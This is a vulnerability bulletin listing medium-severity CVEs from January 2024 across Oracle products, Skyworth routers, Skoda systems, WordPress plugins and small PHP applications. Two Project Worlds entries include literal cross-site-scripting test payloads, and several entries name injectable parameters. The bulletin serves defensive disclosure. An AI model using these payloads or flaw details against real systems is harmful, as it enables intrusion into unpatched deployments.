oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.34 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).2024-01-164.9CVE-2024-20983
secalert_us@oracle.com
oracle -- one-to-one_fulfillmentVulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Documents). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data as well as unauthorized read access to a subset of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20936
secalert_us@oracle.com
oracle -- outside_in_technologyVulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Content Access SDK, Image Export SDK, PDF Export SDK, HTML Export SDK). The supported version that is affected is 8.5.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Outside In Technology accessible data as well as unauthorized read access to a subset of Oracle Outside In Technology accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Outside In Technology. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).2024-01-166.3CVE-2024-20930
secalert_us@oracle.com
oracle -- solarisVulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).2024-01-165.5CVE-2024-20946
secalert_us@oracle.com
oracle -- webcenter_contentVulnerability in the Oracle WebCenter Content product of Oracle Fusion Middleware (component: Content Server). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20928
secalert_us@oracle.com
oracle -- webcenter_sitesVulnerability in the Oracle WebCenter Sites product of Oracle Fusion Middleware (component: Advanced UI). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data as well as unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20908
secalert_us@oracle.com
oracle -- zfs_storage_appliance_kitVulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Core). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).2024-01-164.4CVE-2024-20959
secalert_us@oracle.com
oracle-- multiple_productsVulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Scripting). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).2024-01-165.9CVE-2024-20926
secalert_us@oracle.com
oretnom23 -- house_rental_management_systemA vulnerability, which was classified as problematic, has been found in SourceCodester House Rental Management System 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250607.2024-01-134.8CVE-2024-0499
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
oretnom23 -- house_rental_management_systemA vulnerability, which was classified as problematic, was found in SourceCodester House Rental Management System 1.0. Affected is an unknown function of the component Manage Tenant Details. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250608.2024-01-134.8CVE-2024-0500
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
oretnom23 -- house_rental_management_systemA vulnerability has been found in SourceCodester House Rental Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Manage Invoice Details. The manipulation of the argument Invoice leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250609 was assigned to this vulnerability.2024-01-134.8CVE-2024-0501
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
paxtechnology -- paydroidPAX Android based POS devices with PayDroid_8.1.0_Sagittarius_V11.1.45_20230314 or earlier can allow the signed partition overwrite and subsequently local code execution via hidden command. The attacker must have physical USB access to the device in order to exploit this vulnerability.2024-01-156.8CVE-2023-42134
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
paxtechnology -- paydroidPAX A920Pro/A50 devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow local code execution via parameter injection by bypassing the input validation when flashing a specific partition. The attacker must have physical USB access to the device in order to exploit this vulnerability.2024-01-156.8CVE-2023-42135
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
pcman -- ftp_serverA vulnerability was found in PCMan FTP Server 2.0.7. It has been classified as problematic. This affects an unknown part of the component USER Command Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250719.2024-01-165.3CVE-2021-4432
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
pcman -- ftp_serverA vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability.2024-01-195.3CVE-2024-0731
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
pcman -- ftp_serverA vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555.2024-01-195.3CVE-2024-0732
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul -- art_gallery_management_systemIn PHPGurukul Art Gallery Management System v1.1, "Update Artist Image" functionality of "imageid" parameter is vulnerable to SQL Injection.2024-01-126.5CVE-2023-51978
cve@mitre.org
phpgurukul -- blood_bank_\&_donor_management_systemA vulnerability, which was classified as problematic, was found in Blood Bank & Donor Management 1.0. This affects an unknown part of the file request-received-bydonar.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250581 was assigned to this vulnerability.2024-01-134.8CVE-2024-0476
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul -- company_visitor_management_systemA vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file search-visitor.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251378 is the identifier assigned to this vulnerability.2024-01-184.8CVE-2024-0652
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
piwigo -- piwigoCross Site Scripting vulnerability in piwigo v.14.0.0 allows a remote attacker to obtain sensitive information via the lang parameter in the Admin Tools plug-in component.2024-01-126.1CVE-2023-51790
cve@mitre.org
cve@mitre.org
plone_cms -- plone_cmsA Cross-Frame Scripting vulnerability has been found on Plone CMS affecting version below 6.0.5. An attacker could store a malicious URL to be opened by an administrator and execute a malicios iframe element.2024-01-186.3CVE-2024-0669
cve-coordination@incibe.es
profilepress_membership_team -- paid_membership_plugin,_ecommerce,_user_registration_form,_login_form,_user_profile_&_restrict_content_profilepressDeserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content - ProfilePress.This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content - ProfilePress: from n/a through 4.3.2.2024-01-196.6CVE-2022-45083
audit@patchstack.com
project_worlds -- student_project_allocation_systemA vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.2024-01-194.3CVE-2024-0726
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
project_worlds -- visitor_management_systemA vulnerability was found in Project Worlds Visitor Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file dataset.php of the component URL Handler. The manipulation of the argument name with the input "><script>alert('torada')</script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251376.2024-01-184.3CVE-2024-0650
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
project_worlds_ online -- time_ table_generatorA vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability.2024-01-196.3CVE-2024-0730
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
prosshd -- prosshdA vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548.2024-01-195.3CVE-2024-0725
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
qemu -- qemu_ built-in_VNC_serverA flaw was found in the QEMU built-in VNC server while processing ClientCutText messages. The qemu_clipboard_request() function can be reached before vnc_server_cut_text_caps() was called and had the chance to initialize the clipboard peer, leading to a NULL pointer dereference. This could allow a malicious authenticated VNC client to crash QEMU and trigger a denial of service.2024-01-126.5CVE-2023-6683
secalert@redhat.com
secalert@redhat.com
qstar -- archive_storage_managerQStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 was discovered to contain a DOM Based reflected XSS vulnerability within the component qnme-ajax?method=tree_table.2024-01-136.1CVE-2023-51064
cve@mitre.org
qstar -- archive_storage_managerAn unauthenticated reflected cross-site scripting (XSS) vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 allows attackers to execute arbitrary javascript on a victim's browser via a crafted link.2024-01-136.1CVE-2023-51067
cve@mitre.org
qstar -- archive_storage_managerAn access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily disable the SMB service on a victim's Qstar instance by executing a specific command in a link.2024-01-136.5CVE-2023-51071
cve@mitre.org
qstar -- archive_storage_managerAn unauthenticated log file read in the component log-smblog-save of QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 allows attackers to disclose the SMB Log contents via executing a crafted command.2024-01-135.3CVE-2023-51062
cve@mitre.org
qstar -- archive_storage_managerAn authenticated reflected cross-site scripting (XSS) vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 allows attackers to execute arbitrary javascript on a victim's browser via a crafted link.2024-01-135.4CVE-2023-51068
cve@mitre.org
red_hat -- red_hat_enterprise_linux_8An authentication bypass flaw was found in GRUB due to the way that GRUB uses the UUID of a device to search for the configuration file that contains the password hash for the GRUB password protection feature. An attacker capable of attaching an external drive such as a USB stick containing a file system with a duplicate UUID (the same as in the "/boot/" file system) can bypass the GRUB password protection feature on UEFI systems, which enumerate removable drives before non-removable ones. This issue was introduced in a downstream patch in Red Hat's version of grub2 and does not affect the upstream package.2024-01-155.6CVE-2023-4001
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
rubygems.org-- rubygemsRubygems.org is the Ruby community's gem hosting service. Rubygems.org users with MFA enabled would normally be protected from account takeover in the case of email account takeover. However, a workaround on the forgotten password form allows an attacker to bypass the MFA requirement and takeover the account. This vulnerability has been patched in commit 0b3272a.2024-01-124.8CVE-2024-21654
security-advisories@github.com
security-advisories@github.com
sandsprite scdbg.exe-- sandsprite scdbg.exeAn Uncontrolled Resource Consumption vulnerability has been found on Sandsprite Scdbg.exe, affecting version 1.0. This vulnerability allows an attacker to send a specially crafted shellcode payload to the '/foff' parameter and cause an application shutdown. A malware program could use this shellcode sequence to shut down the application and evade the scan.2024-01-164CVE-2024-0581
cve-coordination@incibe.es
sedlex -- image_zoomMissing Authorization vulnerability in SedLex Image Zoom.This issue affects Image Zoom: from n/a through 1.8.8.2024-01-175.4CVE-2022-41619
audit@patchstack.com
sedlex -- traffic_managerMissing Authorization vulnerability in SedLex Traffic Manager.This issue affects Traffic Manager: from n/a through 1.4.5.2024-01-175.4CVE-2022-41695
audit@patchstack.com
sherlock -- online_fir_systemA vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611.2024-01-136.1CVE-2024-0503
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
shopware -- shopwareShopware is an open headless commerce platform. In the Shopware CMS, the state handler for orders fails to sufficiently verify user authorizations for actions that modify the payment, delivery, and/or order status. Due to this inadequate implementation, users lacking 'write' permissions for orders are still able to change the order state. This issue has been addressed and users are advised to update to Shopware 6.5.7.4. For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.2024-01-164.9CVE-2024-22407
security-advisories@github.com
skoda -- skodaThe Real-Time Streaming Protocol implementation in the MIB3 infotainment incorrectly handles requests to /logs URI, when the id parameter equals to zero. This issue allows an attacker connected to the in-vehicle Wi-Fi network to cause denial-of-service of the infotainment system, when the certain preconditions are met. Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.2024-01-125.3CVE-2023-28898
cve@asrg.io
skoda -- skoda_superb _IIThe secret value used for access to critical UDS services of the MIB3 infotainment is hardcoded in the firmware. Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.2024-01-124CVE-2023-28897
cve@asrg.io
skoda_auto -- s&#xA1;koda_connectThe Skoda Automotive cloud contains a Broken Access Control vulnerability, allowing to obtain nicknames and other user identifiers of Skoda Connect service users by specifying an arbitrary vehicle VIN number.2024-01-185.3CVE-2023-28900
cve@asrg.io
skoda_auto -- skoda_connectThe Skoda Automotive cloud contains a Broken Access Control vulnerability, allowing remote attackers to obtain recent trip data, vehicle mileage, fuel consumption, average and maximum speed, and other information of Skoda Connect service users by specifying an arbitrary vehicle VIN number.2024-01-185.3CVE-2023-28901
cve@asrg.io
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Traceroute parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51719
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Time Server 1 parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51720
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Time Server 2 parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51721
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Time Server 3 parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51722
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Description parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51723
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the URL parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51724
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Contact Email Address parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51725
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the SMTP Server Name parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51726
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the SMTP Username parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51727
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the SMTP Password parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51728
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the DDNS Username parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51729
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the DDNS Password parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51730
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Hostname parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51731
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the IPsec Tunnel Name parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51732
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Identity parameter under Local endpoint settings at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51733
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Identity parameter under Remote endpoint settings at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51734
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Pre-shared key parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51735
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the L2TP/PPTP Username parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51736
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Preshared Phrase parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51737
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Network Name (SSID) parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51738
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Device Name parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.2024-01-175.4CVE-2023-51739
vdisclose@cert-in.org.in
smsot -- smsotA vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556.2024-01-196.3CVE-2024-0733
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
smsot -- smsotA vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability.2024-01-196.3CVE-2024-0734
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester -- online_tours_&_travels_management_systemA vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability.2024-01-196.3CVE-2024-0735
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sparksuite -- simplemdeA vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability.2024-01-174.3CVE-2024-0647
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sqlite -- sqliteA heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.2024-01-164.7CVE-2024-0232
secalert@redhat.com
secalert@redhat.com
swagger_UI -- fastify-swagger-uifastify-swagger-ui is a Fastify plugin for serving Swagger UI. Prior to 2.1.0, the default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module. The vulnerability is fixed in v2.1.0. Setting the `baseDir` option can also work around this vulnerability.2024-01-155.3CVE-2024-22207
security-advisories@github.com
security-advisories@github.com
taokeyun -- taokeyunA vulnerability classified as critical has been found in Taokeyun up to 1.0.5. This affects the function index of the file application/index/controller/app/Video.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250587.2024-01-136.3CVE-2024-0482
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
taokeyun -- taokeyunA vulnerability classified as critical was found in Taokeyun up to 1.0.5. This vulnerability affects the function index of the file application/index/controller/app/Task.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250588.2024-01-136.3CVE-2024-0483
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
themegrill -- colormagThe ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.2024-01-206.5CVE-2024-0679
security@wordfence.com
security@wordfence.com
security@wordfence.com
themeinprogress -- wip_custom_loginMissing Authorization vulnerability in ThemeinProgress WIP Custom Login.This issue affects WIP Custom Login: from n/a through 1.2.7.2024-01-175.4CVE-2022-42884
audit@patchstack.com
themeum -- wp_crowdfundingThe WP Crowdfunding WordPress plugin before 2.1.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)2024-01-154.8CVE-2023-6163
contact@wpscan.com
